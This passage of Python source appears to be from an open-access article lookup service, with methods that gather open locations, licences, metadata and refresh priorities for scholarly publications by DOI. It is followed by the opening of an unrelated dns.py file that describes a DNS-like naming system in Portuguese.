elif self.is_same_publisher("Wiley-Blackwell"):
has_open_manuscript = False
elif self.is_same_publisher("Wiley"):
pdf_url = 'https://rss.onlinelibrary.wiley.com/doi/am-pdf/{}'.format(self.doi)
elif self.is_same_publisher("American Geophysical Union (AGU)"):
pdf_url = 'https://rss.onlinelibrary.wiley.com/doi/am-pdf/{}'.format(self.doi)
elif self.is_same_publisher("Royal Society of Chemistry (RSC)"):
has_open_manuscript = False
elif self.is_same_publisher("Oxford University Press (OUP)"):
has_open_manuscript = False
# just bail for now. is too hard to figure out which ones are real.
# # IOP isn't trustworthy, and made a fuss, so check them.
# # this includes /ampdf: http://iopscience.iop.org/article/10.1088/0029-5515/55/8/083011
# # this does not: http://iopscience.iop.org/article/10.1088/1741-2552/aad46e
#
# logger.info(u"doing live check on IOP author manuscript")
# r = requests.get("http://iopscience.iop.org/article/{}".format(self.id))
# if "/ampdf" in r.content:
# logger.info(u"is iop open manuscript!")
# pdf_url = "http://iopscience.iop.org/article/{}/ampdf".format(self.id)
# else:
# logger.info(u"is NOT iop open manuscript")
# has_open_manuscript = False
elif freetext_license == 'https://academic.oup.com/journals/pages/open_access/funder_policies/chorus/standard_publication_model':
# license says available after 12 months
oa_date = self.issued + relativedelta(months=12)
if has_open_manuscript:
evidence = "open (via crossref license, author manuscript)"
elif self.predicted_bronze_embargo_end:
evidence = "embargoed (via journal policy)"
oa_date = self.predicted_bronze_embargo_end
if (
evidence
and self.resolved_doi_url
and self.resolved_doi_url.startswith('https://journals.co.za')
and self.resolved_doi_http_status == 404
):
fulltext_url = 'https://journals.co.za/doi/{}'.format(self.id.upper())
self.resolved_doi_http_status = 203
failed_scrape = self.resolved_doi_http_status in [404, -1] and self.issn_l not in [
'2324-1098', # gold and online, but can't scrape it for some reason
]
if evidence and not failed_scrape:
my_location = OpenLocation()
my_location.metadata_url = fulltext_url
my_location.license = license
my_location.evidence = evidence
my_location.updated = datetime.datetime.utcnow()
my_location.doi = self.doi
my_location.version = version
my_location.oa_date = oa_date
my_location.publisher_specific_license = publisher_specific_license
if pdf_url:
my_location.pdf_url = pdf_url
is_future = my_location.oa_date and my_location.oa_date > datetime.datetime.utcnow().date()
if my_location.oa_status is OAStatus.bronze and not is_future:
my_location.oa_date = None
if self.is_preprint:
self.make_preprint(my_location)
return {'location': my_location, 'is_future': is_future}
return None
def ask_pmc(self):
for pmc_obj in self.pmcid_links:
if pmc_obj.release_date == "live":
my_location = OpenLocation()
my_location.metadata_url = "https://www.ncbi.nlm.nih.gov/pmc/articles/{}".format(pmc_obj.pmcid.upper())
# we don't know this has a pdf version
# my_location.pdf_url = "https://www.ncbi.nlm.nih.gov/pmc/articles/{}/pdf".format(pmc_obj.pmcid.upper())
my_location.evidence = "oa repository (via pmcid lookup)"
my_location.updated = datetime.datetime.utcnow()
my_location.doi = self.doi
my_location.version = pmc_obj.version
# set version in one central place for pmc right now, till refactor done
self.open_locations.append(my_location)
@property
def has_stored_hybrid_scrape(self):
return self.scrape_evidence and self.scrape_evidence != "closed"
def ask_hybrid_scrape(self):
if self.has_stored_hybrid_scrape:
my_location = OpenLocation()
my_location.pdf_url = self.scrape_pdf_url
my_location.metadata_url = self.scrape_metadata_url
my_location.license = self.scrape_license
my_location.evidence = self.scrape_evidence
my_location.updated = self.scrape_updated and self.scrape_updated.isoformat()
my_location.doi = self.doi
my_location.version = "publishedVersion"
if my_location.pdf_url and '/article/am/pii/' in my_location.pdf_url:
my_location.version = "acceptedVersion"
if self.is_preprint:
self.make_preprint(my_location)
if my_location.oa_status in [OAStatus.gold, OAStatus.hybrid, OAStatus.green]:
my_location.oa_date = self.issued
if self.issn_l == '0270-6474' and my_location.oa_date:
my_location.oa_date = my_location.oa_date + datetime.timedelta(days=190)
if my_location.oa_date and my_location.oa_date > datetime.datetime.utcnow().date():
self.embargoed_locations.append(my_location)
else:
self.open_locations.append(my_location)
else:
self.open_locations.append(my_location)
@property
def page_matches_by_doi_filtered(self):
return self.page_matches_by_doi + self.repo_page_matches_by_doi
@property
def page_matches_by_title_filtered(self):
my_pages = []
if not self.normalized_title:
return my_pages
for my_page in self.repo_page_matches_by_title:
# don't do this right now. not sure if it helps or hurts.
# don't check title match if we already know it belongs to a different doi
# if my_page.doi and my_page.doi != self.doi:
# continue
if hasattr(my_page, "pmh_record") and my_page.pmh_record and is_known_mismatch(self.id, my_page.pmh_record):
continue
# double check author match
match_type = "title"
if self.first_author_lastname or self.last_author_lastname:
if my_page.authors:
try:
pmh_author_string = normalize(", ".join(my_page.authors))
if self.first_author_lastname and normalize(self.first_author_lastname) in pmh_author_string:
match_type = "title and first author"
elif self.last_author_lastname and normalize(self.last_author_lastname) in pmh_author_string:
match_type = "title and last author"
else:
# logger.info(
# u"author check fails, so skipping this record. Looked for {} and {} in {}".format(
# self.first_author_lastname, self.last_author_lastname, pmh_author_string))
# logger.info(self.authors)
# don't match if bad author match
continue
except TypeError:
pass # couldn't make author string
my_page.match_evidence = "oa repository (via OAI-PMH {} match)".format(match_type)
my_pages.append(my_page)
return my_pages
@property
def pages(self):
my_pages = []
# @todo remove these checks once we are just using the new page
if self.normalized_title:
if title_is_too_short(self.normalized_title):
# logger.info(u"title too short! don't match by title")
pass
elif title_is_too_common(self.normalized_title):
# logger.info(u"title too common! don't match by title.")
pass
elif self.id and '/(issn)' in self.id.lower():
pass
else:
my_pages = self.page_matches_by_title_filtered
if max_pages_from_one_repo([p.endpoint_id for p in self.page_matches_by_title_filtered]) >= 10:
my_pages = []
logger.info("matched too many pages in one repo, not allowing matches")
# do dois last, because the objects are actually the same, not copies, and then they get the doi reason
for my_page in self.page_matches_by_doi_filtered:
my_page.match_evidence = "oa repository (via OAI-PMH doi match)"
if not my_page.scrape_version and "/pmc/" in my_page.url:
my_page.set_info_for_pmc_page()
my_pages.append(my_page)
return [
p for p in my_pages
# don't match bioRxiv or Research Square preprints to themselves
if not (p.doi == self.doi and p.endpoint_id in [
oa_page.biorxiv_endpoint_id, oa_page.research_square_endpoint_id
])
]
def ask_green_locations(self):
has_new_green_locations = False
for my_page in [p for p in self.pages if p.pmh_id != oa_page.publisher_equivalent_pmh_id]:
# this step isn't scraping, is just looking in db
# recalculate the version and license based on local PMH metadata in case code changes find more things
if hasattr(my_page, "scrape_version") and my_page.scrape_version is not None:
my_page.update_with_local_info()
if my_page.is_open:
new_open_location = OpenLocation()
new_open_location.pdf_url = my_page.scrape_pdf_url
new_open_location.metadata_url = my_page.scrape_metadata_url
new_open_location.license = my_page.scrape_license
new_open_location.evidence = my_page.match_evidence
new_open_location.version = my_page.scrape_version
new_open_location.updated = my_page.scrape_updated
new_open_location.doi = self.doi
new_open_location.pmh_id = my_page.bare_pmh_id
new_open_location.endpoint_id = my_page.endpoint_id
new_open_location.institution = my_page.repository_display_name
new_open_location.oa_date = my_page.first_available
# dates only reliably recorded after 2020-08-07
if new_open_location.oa_date and new_open_location.oa_date < datetime.date(2020, 8, 7):
new_open_location.oa_date = None
self.open_locations.append(new_open_location)
has_new_green_locations = True
return has_new_green_locations
def ask_publisher_equivalent_pages(self):
has_new_green_locations = False
for my_page in [p for p in self.pages if p.pmh_id == oa_page.publisher_equivalent_pmh_id]:
if my_page.is_open:
new_open_location = OpenLocation()
new_open_location.pdf_url = my_page.scrape_pdf_url
new_open_location.metadata_url = my_page.scrape_metadata_url
new_open_location.license = my_page.scrape_license
new_open_location.evidence = my_page.scrape_version
new_open_location.version = 'publishedVersion'
new_open_location.updated = my_page.scrape_updated
new_open_location.doi = my_page.doi
new_open_location.pmh_id = None
new_open_location.endpoint_id = None
if new_open_location.is_hybrid:
new_open_location.oa_date = self.issued
self.open_locations.append(new_open_location)
has_new_green_locations = True
return has_new_green_locations
def ask_s2(self):
lookup = db.session.query(S2Lookup).get(self.doi)
if lookup:
location = OpenLocation()
location.endpoint_id = s2_endpoint_id
location.pdf_url = lookup.s2_pdf_url
location.metadata_url = lookup.s2_url
location.evidence = 'oa repository (semantic scholar lookup)'
location.updated = datetime.datetime(2019, 10, 1)
location.doi = self.doi
location.version = 'submittedVersion'
self.open_locations.append(location)
def scrape_green_locations(self, green_scrape=GreenScrapeAction.queue):
for my_page in self.pages:
if isinstance(my_page, page.PageNew):
if green_scrape is GreenScrapeAction.scrape_now:
my_page.scrape_if_matches_pub()
elif green_scrape is GreenScrapeAction.queue:
my_page.enqueue_scrape_if_matches_pub()
# comment out for now so that not scraping by accident
# def scrape_these_pages(self, webpages):
# webpage_arg_list = [[page] for page in webpages]
# call_args_in_parallel(self.scrape_page_for_open_location, webpage_arg_list)
def scrape_page_for_open_location(self, my_webpage):
try:
if not self.should_scrape_publisher_page():
logger.info('skipping publisher scrape')
return
find_pdf_link = self.should_look_for_publisher_pdf()
if not find_pdf_link:
logger.info('skipping pdf search')
my_webpage.scrape_for_fulltext_link(find_pdf_link=find_pdf_link, pdf_hint=self.crossref_text_mining_pdf)
if my_webpage.error:
self.error += my_webpage.error
if my_webpage.is_open:
my_open_location = my_webpage.mint_open_location()
self.open_locations.append(my_open_location)
# logger.info(u"found open version at", webpage.url)
else:
# logger.info(u"didn't find open version at", webpage.url)
pass
except requests.Timeout as e:
self.error += "Timeout in scrape_page_for_open_location on {}: {}".format(
my_webpage, str(e))
logger.info(self.error)
except requests.exceptions.ConnectionError as e:
self.error += "ConnectionError in scrape_page_for_open_location on {}: {}".format(
my_webpage, str(e))
logger.info(self.error)
except requests.exceptions.ChunkedEncodingError as e:
self.error += "ChunkedEncodingError in scrape_page_for_open_location on {}: {}".format(
my_webpage, str(e))
logger.info(self.error)
except requests.exceptions.RequestException as e:
self.error += "RequestException in scrape_page_for_open_location on {}: {}".format(
my_webpage, str(e))
logger.info(self.error)
except etree.XMLSyntaxError as e:
self.error += "XMLSyntaxError in scrape_page_for_open_location on {}: {}".format(
my_webpage, str(e))
logger.info(self.error)
except Exception:
logger.exception("Exception in scrape_page_for_open_location")
self.error += "Exception in scrape_page_for_open_location"
logger.info(self.error)
def should_scrape_publisher_page(self):
if self.genre == 'journal':
return False
return True
def should_look_for_publisher_pdf(self):
if self.genre == 'book':
return False
if self.issn_l in [
# landing page has pdfs for every article in issue
'1818-5487', # Aquatic Invasions
'2072-5981', # Magnetic resonance in solids
'1989-8649', # Management of Biological Invasions
'2164-3989', # The Professional Counselor
'0970-9274', # Journal of Human Ecology
'0973-5070', # STUDIES ON ETHNO-MEDICINE
# in doaj, PDF has full issue so landing page is more specific
'2471-190X', # Open Rivers: Rethinking Water, Place & Community
'0097-6156', # Books
# in doaj, doi leads to current issue so PDF is useless
'0210-6124', # Atlantis. Journal of the Spanish Association for Anglo-American Studies
]:
return False
if self.issn_l == '0007-0610' and self.year <= 1999:
# British Dental Journal, https://www.nature.com/articles/4806453.pdf
return False
return True
def set_title_hacks(self):
workaround_titles = {
# these preprints doesn't have the same title as the doi
# eventually solve these by querying arxiv like this:
# http://export.arxiv.org/api/query?search_query=doi:10.1103/PhysRevD.89.085017
"10.1016/j.astropartphys.2007.12.004": "In situ radioglaciological measurements near Taylor Dome, Antarctica and implications for UHE neutrino astronomy",
"10.1016/s0375-9601(02)01803-0": "Universal quantum computation using only projective measurement, quantum memory, and preparation of the 0 state",
"10.1103/physreva.65.062312": "An entanglement monotone derived from Grover's algorithm",
# crossref has title "aol" for this
# set it to real title
"10.1038/493159a": "Altmetrics: Value all research products",
# crossref has no title for this
"10.1038/23891": "Complete quantum teleportation using nuclear magnetic resonance",
# is a closed-access datacite one, with the open-access version in BASE
# need to set title here because not looking up datacite titles yet (because ususally open access directly)
"10.1515/fabl.1988.29.1.21": "Thesen zur Verabschiedung des Begriffs der 'historischen Sage'",
# preprint has a different title
"10.1123/iscj.2016-0037": "METACOGNITION AND PROFESSIONAL JUDGMENT AND DECISION MAKING: IMPORTANCE, APPLICATION AND EVALUATION",
# preprint has a different title
"10.1038/s41477-017-0066-9": "Low Rate of Somatic Mutations in a Long-Lived Oak Tree",
"10.1101/2020.08.10.238428": "Cell-programmed nutrient partitioning in the tumour microenvironment",
# mysteriously missing from crossref now
"10.1093/annweh/wxy044": "Development of and Selected Performance Characteristics of CANJEM, a General Population Job-Exposure Matrix Based on Past Expert Assessments of Exposure"
}
if self.doi in workaround_titles:
self.title = workaround_titles[self.doi]
self.normalized_title = normalize_title(self.title)
def set_license_hacks(self):
if self.fulltext_url and "harvard.edu/" in self.fulltext_url:
if not self.license or self.license == "unknown":
self.license = "cc-by-nc"
@property
def crossref_alternative_id(self):
try:
return re.sub(r"\s+", " ", self.crossref_api_raw_new["alternative-id"][0])
except (KeyError, TypeError, AttributeError):
return None
@property
def publisher(self):
try:
return re.sub("\s+", " ", self.crossref_api_modified["publisher"])
except (KeyError, TypeError, AttributeError):
return None
@property
def volume(self):
try:
return self.crossref_api_raw_new["volume"]
except (KeyError, TypeError, AttributeError):
return None
@property
def issue(self):
try:
return self.crossref_api_raw_new["issue"]
except (KeyError, TypeError, AttributeError):
return None
@property
def first_page(self):
try:
return self.crossref_api_raw_new["page"].split('-')[0]
except (KeyError, TypeError, AttributeError):
return None
@property
def last_page(self):
try:
return self.crossref_api_raw_new["page"].split('-')[-1]
except (KeyError, TypeError, AttributeError):
return None
@property
def issued(self):
try:
if self.crossref_api_raw_new and "date-parts" in self.crossref_api_raw_new["issued"]:
date_parts = self.crossref_api_raw_new["issued"]["date-parts"][0]
return get_citeproc_date(*date_parts)
except (KeyError, TypeError, AttributeError):
return None
@property
def deposited(self):
try:
if self.crossref_api_raw_new and "date-parts" in self.crossref_api_raw_new["deposited"]:
date_parts = self.crossref_api_raw_new["deposited"]["date-parts"][0]
return get_citeproc_date(*date_parts)
except (KeyError, TypeError, AttributeError):
return None
@property
def created(self):
try:
if self.crossref_api_raw_new and "date-parts" in self.crossref_api_raw_new["created"]:
date_parts = self.crossref_api_raw_new["created"]["date-parts"][0]
return get_citeproc_date(*date_parts)
except (KeyError, TypeError, AttributeError):
return None
@property
def crossref_text_mining_pdf(self):
try:
for link in self.crossref_api_modified['link']:
if (
link['content-version'] == 'vor' and
link['intended-application'] == 'text-mining' and
link['content-version'] == 'application/pdf'
):
return link['URL']
except (KeyError, TypeError, AttributeError):
return None
@property
def open_manuscript_licenses(self):
try:
license_dicts = self.crossref_api_modified["license"]
author_manuscript_urls = []
for license_dict in license_dicts:
if license_dict["URL"] in oa_local.closed_manuscript_license_urls():
continue
license_date = None
if license_dict.get("content-version", None):
if license_dict["content-version"] == "am":
if license_dict.get("start", None):
if license_dict["start"].get("date-time", None):
license_date = license_dict["start"]["date-time"]
try:
license_date = license_date and dateutil.parser.parse(license_date).date()
license_date += self._author_manuscript_delay()
except Exception:
license_date = None
author_manuscript_urls.append({'url': license_dict["URL"], 'date': license_date})
return sorted(author_manuscript_urls, key=lambda amu: amu['date'])
except (KeyError, TypeError):
return []
def _author_manuscript_delay(self):
if self.is_same_publisher('Institute of Electrical and Electronics Engineers (IEEE)'):
# policy says 2 years after publication but license date is date of publication
return datetime.timedelta(days=365*2)
else:
return datetime.timedelta()
@property
def crossref_licenses(self):
unspecified_version_publishers = [
'Informa UK Limited',
'Geological Society of London',
]
allow_unspecified = any([self.is_same_publisher(p) for p in unspecified_version_publishers])
tdm_publishers = ['Uniwersytet Jagiellonski - Wydawnictwo Uniwersytetu Jagiellonskiego']
allow_tdm = any([self.is_same_publisher(p) for p in tdm_publishers])
try:
license_dicts = self.crossref_api_modified["license"]
license_urls = []
for license_dict in license_dicts:
license_date = None
if license_version := license_dict.get("content-version", None):
if (
license_version == "vor"
or (allow_unspecified and license_version == "unspecified")
or (allow_tdm and license_version == "tdm")
):
if license_dict.get("start", None):
if license_dict["start"].get("date-time", None):
license_date = license_dict["start"].get("date-time", None)
try:
license_date = license_date and dateutil.parser.parse(license_date).date()
except Exception:
license_date = None
license_urls.append({'url': license_dict["URL"], 'date': license_date})
return sorted(license_urls, key=lambda license: license['date'])
except (KeyError, TypeError):
return []
@property
def is_subscription_journal(self):
if (
oa_local.is_open_via_doaj(self.issns, self.all_journals, self.year)
or oa_local.is_open_via_doi_fragment(self.doi)
or oa_local.is_open_via_publisher(self.publisher)
or self.is_open_journal_via_observed_oa_rate()
or oa_local.is_open_via_manual_journal_setting(self.issns, self.year)
or oa_local.is_open_via_url_fragment(self.url)
):
return False
return True
@property
def doi_resolver(self):
if not self.doi:
return None
if oa_local.is_open_via_datacite_prefix(self.doi):
return "datacite"
if self.crossref_api_modified and "error" not in self.crossref_api_modified:
return "crossref"
return None
@property
def is_free_to_read(self):
return bool(self.fulltext_url)
@property
def is_boai_license(self):
boai_licenses = ["cc-by", "cc0", "pd"]
if self.license and (self.license in boai_licenses):
return True
return False
@property
def authors(self):
try:
return self.crossref_api_modified["all_authors"]
except (AttributeError, TypeError, KeyError):
return None
@property
def first_author_lastname(self):
try:
return self.crossref_api_modified["first_author_lastname"]
except (AttributeError, TypeError, KeyError):
return None
@property
def last_author_lastname(self):
try:
last_author = self.authors[-1]
return last_author["family"]
except (AttributeError, TypeError, KeyError):
return None
@property
def display_issns(self):
if self.issns:
return ",".join(self.issns)
return None
@property
def issns(self):
issns = []
try:
issns = self.crossref_api_modified["issn"]
except (AttributeError, TypeError, KeyError):
try:
issns = self.crossref_api_modified["issn"]
except (AttributeError, TypeError, KeyError):
if self.tdm_api:
issns = re.findall("<issn media_type=.*>(.*)</issn>", self.tdm_api)
if not issns:
return None
else:
return issns
@property
def best_title(self):
if hasattr(self, "title") and self.title:
return re.sub("\s+", " ", self.title)
return self.crossref_title
@property
def crossref_title(self):
try:
return re.sub("\s+", " ", self.crossref_api_modified["title"])
except (AttributeError, TypeError, KeyError, IndexError):
return None
@property
def year(self):
try:
return self.crossref_api_modified["year"]
except (AttributeError, TypeError, KeyError, IndexError):
return None
@property
def journal(self):
try:
return re.sub("\s+", " ", self.crossref_api_modified["journal"])
except (AttributeError, TypeError, KeyError, IndexError):
return None
@property
def all_journals(self):
try:
return self.crossref_api_modified["all_journals"]
except (AttributeError, TypeError, KeyError, IndexError):
return None
@property
def genre(self):
try:
return re.sub("\s+", " ", self.crossref_api_modified["type"])
except (AttributeError, TypeError, KeyError):
return None
@property
def abstract_from_crossref(self):
try:
return self.crossref_api_raw_new["abstract"]
except (AttributeError, TypeError, KeyError):
return None
@property
def deduped_sorted_locations(self):
locations = []
sorted_locations = self.sorted_locations
# transfer PDF URLs from bronze location to hybrid location
# then best_url is the same, and they aren't duplicated
# be very conservative - only merge if exactly one location with pdf and one without,
# and both are published versions hosted by the publisher
publisher_no_pdf = [
loc for loc in sorted_locations
if loc.host_type == "publisher" and loc.version == "publishedVersion" and not loc.pdf_url
]
publisher_pdf = [
loc for loc in sorted_locations
if loc.host_type == "publisher" and loc.version == "publishedVersion" and loc.pdf_url
]
if len(publisher_no_pdf) == 1 and len(publisher_pdf) == 1:
if publisher_no_pdf[0].metadata_url == publisher_pdf[0].metadata_url:
publisher_no_pdf[0].pdf_url = publisher_pdf[0].pdf_url
for next_location in sorted_locations:
urls_so_far = [location.best_url for location in locations]
if next_location.best_url not in urls_so_far:
locations.append(next_location)
return locations
@property
def filtered_locations(self):
locations = self.open_locations
# now remove noncompliant ones
compliant_locations = [location for location in locations if not location.is_reported_noncompliant]
validate_pdf_urls(compliant_locations)
valid_locations = [
x for x in compliant_locations
if x.pdf_url_valid
and not (self.has_bad_doi_url and x.best_url == self.url)
and x.endpoint_id != '01b84da34b861aa938d' # lots of abstracts presented as full text. find a better way to do this.
and x.endpoint_id != '58e562cef9eb07c3c1d' # garbage PDFs in identifier tags
]
for location in valid_locations:
if location.pdf_url:
location.pdf_url = fix_url_scheme(location.pdf_url)
if location.metadata_url:
location.metadata_url = fix_url_scheme(location.metadata_url)
return valid_locations
@property
def sorted_locations(self):
locations = self.filtered_locations
# first sort by best_url so ties are handled consistently
locations = sorted(locations, key=lambda x: x.best_url, reverse=False)
# now sort by what's actually better
locations = sorted(locations, key=lambda x: x.sort_score, reverse=False)
return locations
@property
def data_standard(self):
if self.scrape_updated and not self.error:
return 2
else:
return 1
def lookup_issn_l(self):
for issn in self.issns or []:
# use the first issn that matches an issn_l
# can't really do anything if they would match different issn_ls
lookup = db.session.query(IssnlLookup).get(issn)
if lookup:
return lookup
return None
def lookup_journal(self):
return self.issn_l and db.session.query(Journal).options(
orm.defer('api_raw_crossref'), orm.defer('api_raw_issn')
).get({'issn_l': self.issn_l})
def get_resolved_url(self):
if hasattr(self, "my_resolved_url_cached"):
return self.my_resolved_url_cached
try:
r = requests.get("http://doi.org/{}".format(self.id),
stream=True,
allow_redirects=True,
timeout=(3,3),
verify=False
)
self.my_resolved_url_cached = r.url
except Exception: #hardly ever do this, but man it seems worth it right here
logger.exception("get_resolved_url failed")
self.my_resolved_url_cached = None
return self.my_resolved_url_cached
def __repr__(self):
if self.id:
my_string = self.id
else:
my_string = self.best_title
return "<Pub ( {} )>".format(my_string)
@property
def reported_noncompliant_copies(self):
return reported_noncompliant_url_fragments(self.doi)
def is_same_publisher(self, publisher):
if self.publisher:
return normalize(self.publisher) == normalize(publisher)
return False
@property
def best_url(self):
if not self.best_oa_location:
return None
return self.best_oa_location.best_url
@property
def best_url_is_pdf(self):
if not self.best_oa_location:
return None
return self.best_oa_location.best_url_is_pdf
@property
def best_evidence(self):
if not self.best_oa_location:
return None
return self.best_oa_location.display_evidence
@property
def best_host(self):
if not self.best_oa_location:
return None
return self.best_oa_location.host_type
@property
def best_repo_id(self):
if self.best_host != 'repository':
return None
return self.best_oa_location.endpoint_id
@property
def best_license(self):
if not self.best_oa_location:
return None
return self.best_oa_location.license
@property
def best_version(self):
if not self.best_oa_location:
return None
return self.best_oa_location.version
@property
def best_oa_location_dict(self):
best_location = self.best_oa_location
if best_location:
return best_location.to_dict_v2()
return None
@property
def best_oa_location(self):
all_locations = [location for location in self.all_oa_locations]
if all_locations:
return all_locations[0]
return None
@property
def first_oa_location_dict(self):
first_location = self.first_oa_location
if first_location:
return first_location.to_dict_v2()
return None
@property
def first_oa_location(self):
all_locations = [location for location in self.all_oa_locations]
if all_locations:
return sorted(all_locations, key=lambda loc: (loc.oa_date or datetime.date.max, loc.sort_score))[0]
return None
@property
def all_oa_locations(self):
all_locations = [location for location in self.deduped_sorted_locations]
if all_locations:
for location in all_locations:
location.is_best = False
all_locations[0].is_best = True
return all_locations
def all_oa_location_dicts(self):
return [location.to_dict_v2() for location in self.all_oa_locations]
def embargoed_oa_location_dicts(self):
return [location.to_dict_v2() for location in self.embargoed_locations]
def to_dict_v1(self):
response = {
"algorithm_version": self.data_standard,
"doi_resolver": self.doi_resolver,
"evidence": self.evidence,
"free_fulltext_url": self.fulltext_url,
"is_boai_license": self.is_boai_license,
"is_free_to_read": self.is_free_to_read,
"is_subscription_journal": self.is_subscription_journal,
"license": self.license,
"oa_color": self.oa_status and self.oa_status.value,
"reported_noncompliant_copies": self.reported_noncompliant_copies
}
for k in ["doi", "title", "url"]:
value = getattr(self, k, None)
if value:
response[k] = value
if self.error:
response["error"] = self.error
return response
@property
def best_location(self):
if not self.deduped_sorted_locations:
return None
return self.deduped_sorted_locations[0]
@property
def is_archived_somewhere(self):
if self.is_oa:
return any([location.oa_status is OAStatus.green for location in self.deduped_sorted_locations])
return None
@property
def oa_is_doaj_journal(self):
if self.is_oa:
if oa_local.is_open_via_doaj(self.issns, self.all_journals, self.year):
return True
else:
return False
return False
@property
def oa_is_open_journal(self):
if self.is_oa:
if self.oa_is_doaj_journal:
return True
if oa_local.is_open_via_publisher(self.publisher):
return True
if oa_local.is_open_via_manual_journal_setting(self.issns, self.year):
return True
if self.is_open_journal_via_observed_oa_rate():
return True
if oa_local.is_open_via_publisher_genre(self.publisher, self.genre):
return True
if oa_local.is_open_via_journal_doi_prefix(self.doi):
return True
return False
@property
def display_updated(self):
if self.updated:
return self.updated.isoformat()
return None
@property
def has_abstract(self):
if self.abstracts:
return True
return False
@property
def display_abstracts(self):
return []
@property
def predicted_bronze_embargo_end(self):
published = self.issued or self.deposited or datetime.date(1970, 1, 1)
journal = self.lookup_journal()
if journal and journal.embargo and journal.embargo + published > datetime.date.today():
return journal.embargo + published
return None
@property
def refresh_priority(self):
published = self.issued or self.deposited or datetime.date(1970, 1, 1)
today = datetime.date.today()
journal = self.lookup_journal()
if published > datetime.date.today():
# refresh things that aren't published yet infrequently
refresh_interval = datetime.timedelta(days=365)
elif self.oa_status is OAStatus.bronze and self.scrape_pdf_url is None:
# refresh bronze articles without PDFs often since PDF check won't catch them if they change
refresh_interval = datetime.timedelta(days=30)
else:
if self.oa_status in [OAStatus.closed, OAStatus.green]:
# look for delayed-OA articles after common embargo periods by adjusting the published date
if journal and journal.embargo and journal.embargo + published < today:
# article is past known embargo period
if not self.scrape_metadata_url:
published += journal.embargo
elif journal and journal.delayed_oa and not self.scrape_metadata_url:
# treat every 6th mensiversary for the first 4 years like the publication date
six_months = relativedelta(months=6)
shifts = 0
while shifts < 8 and published < today - six_months:
published += six_months
shifts += 1
age = today - published
# arbitrary scale factor, refresh newer things more often
refresh_interval = age / 6
if self.genre == 'component':
refresh_interval *= 2
refresh_interval = clamp(refresh_interval, datetime.timedelta(days=2), datetime.timedelta(days=365))
last_refresh = self.scrape_updated or datetime.datetime(1970, 1, 1)
since_last_refresh = datetime.datetime.utcnow() - last_refresh
priority = (since_last_refresh - refresh_interval).total_seconds() / refresh_interval.total_seconds()
return priority
@property
def has_bad_doi_url(self):
return (
(self.issns and (
# links don't resolve
'1507-1367' in self.issns or
# links don't resolve
'0718-1876' in self.issns or
# links don't resolve
'2237-0722' in self.issns
)) or
# pdf abstracts
self.id.startswith('10.5004/dwt.') or
self.id == '10.2478/cirr-2019-0007'
)
def is_open_journal_via_observed_oa_rate(self):
lookup = self.issn_l and db.session.query(JournalOaStartYear).get({'issn_l': self.issn_l})
return lookup and self.issued and self.issued.year >= lookup.oa_year
def store_refresh_priority(self):
stmt = sql.text(
'update pub_refresh_queue set priority = :priority where id = :id'
).bindparams(priority=self.refresh_priority, id=self.id)
db.session.execute(stmt)
def store_preprint_relationships(self):
preprint_relationships = []
if self.crossref_api_raw_new and self.crossref_api_raw_new.get('relation', None):
postprints = self.crossref_api_raw_new['relation'].get('is-preprint-of', [])
postprint_dois = [p.get('id', None) for p in postprints if p.get('id-type', None) == 'doi']
for postprint_doi in postprint_dois:
try:
normalized_postprint_doi = normalize_doi(postprint_doi)
preprint_relationships.append({'preprint_id': self.doi, 'postprint_id': normalized_postprint_doi})
except Exception:
pass
preprints = self.crossref_api_raw_new['relation'].get('has-preprint', [])
preprint_dois = [p.get('id', None) for p in preprints if p.get('id-type', None) == 'doi']
for preprint_doi in preprint_dois:
try:
normalized_preprint_doi = normalize_doi(preprint_doi)
preprint_relationships.append({'preprint_id': normalized_preprint_doi, 'postprint_id': self.doi})
except Exception:
pass
for preprint_relationship in preprint_relationships:
db.session.merge(Preprint(**preprint_relationship))
def store_retractions(self):
retracted_dois = set()
if self.crossref_api_raw_new:
for update_to in self.crossref_api_raw_new.get('update-to', []):
if update_to.get('type') == 'retraction':
if retracted_doi := normalize_doi(update_to.get('DOI'), return_none_if_error=True):
retracted_dois.add(retracted_doi)
db.session.query(Retraction).filter(
Retraction.retraction_doi == self.doi,
Retraction.retracted_doi.notin_(list(retracted_dois))
).delete()
for retracted_doi in retracted_dois:
db.session.merge(Retraction(retraction_doi=self.doi, retracted_doi=retracted_doi))
def store_pdf_urls_for_validation(self):
urls = {loc.pdf_url for loc in self.open_locations if loc.pdf_url and not is_pmc(loc.pdf_url)}
for url in urls:
db.session.merge(
PdfUrl(url=url, publisher=self.publisher)
)
def mint_pages(self):
for p in oa_page.make_oa_pages(self):
db.session.merge(p)
@staticmethod
def dict_v2_fields():
return OrderedDict([
("doi", lambda p: p.doi),
("doi_url", lambda p: p.url),
("title", lambda p: p.best_title),
("genre", lambda p: p.genre),
("is_paratext", lambda p: p.is_paratext),
("published_date", lambda p: p.issued and p.issued.isoformat()),
("year", lambda p: p.year),
("journal_name", lambda p: p.journal),
("journal_issns", lambda p: p.display_issns),
("journal_issn_l", lambda p: p.issn_l),
("journal_is_oa", lambda p: p.oa_is_open_journal),
("journal_is_in_doaj", lambda p: p.oa_is_doaj_journal),
("publisher", lambda p: p.publisher),
("is_oa", lambda p: p.is_oa),
("oa_status", lambda p: p.oa_status and p.oa_status.value),
("has_repository_copy", lambda p: p.has_green),
("best_oa_location", lambda p: p.best_oa_location_dict),
("first_oa_location", lambda p: p.first_oa_location_dict),
("oa_locations", lambda p: p.all_oa_location_dicts()),
("oa_locations_embargoed", lambda p: p.embargoed_oa_location_dicts()),
("updated", lambda p: p.display_updated),
("data_standard", lambda p: p.data_standard),
("z_authors", lambda p: p.authors),
])
def to_dict_v2(self):
response = OrderedDict([(key, func(self)) for key, func in Pub.dict_v2_fields().items()])
return response
def to_dict_search(self):
response = self.to_dict_v2()
response["abstracts"] = self.display_abstracts
del response["z_authors"]
if self.authors:
response["author_lastnames"] = [author.get("family", None) for author in self.authors]
else:
response["author_lastnames"] = []
if not hasattr(self, "score"):
self.score = None
response["score"] = self.score
if not hasattr(self, "snippet"):
self.snippet = None
response["snippet"] = self.snippet
return response
# db.create_all()
# commit_success = safe_commit(db)
# if not commit_success:
# logger.info(u"COMMIT fail making objects")
|
dns.py
|
#!/usr/bin/env python3
# coding=utf-8
"""
Implementação de um sistema de nomeação similar ao DNS
Cada objeto NameServer representaria um servidor de nomes real.
Implementação do lookup iterativo.
"""
import json
import logging
import socket
import threading
class NameServer(object):
"""
Descreve um domínio, que pode conter subdomínios.
Argumentos:
name -- Nome do servidor.
level -- Valor que representa o nível hierárquico desse servidor.
A raiz tem level 1, os filhos do servidor raiz tem level 2, os filhos
